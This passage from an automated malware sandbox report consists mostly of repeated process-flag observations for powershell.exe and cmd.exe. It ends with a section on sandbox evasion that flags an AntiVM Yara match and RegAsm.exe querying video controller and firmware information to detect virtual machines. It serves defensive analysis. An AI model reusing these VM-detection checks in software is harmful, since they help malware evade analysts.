            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTR
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
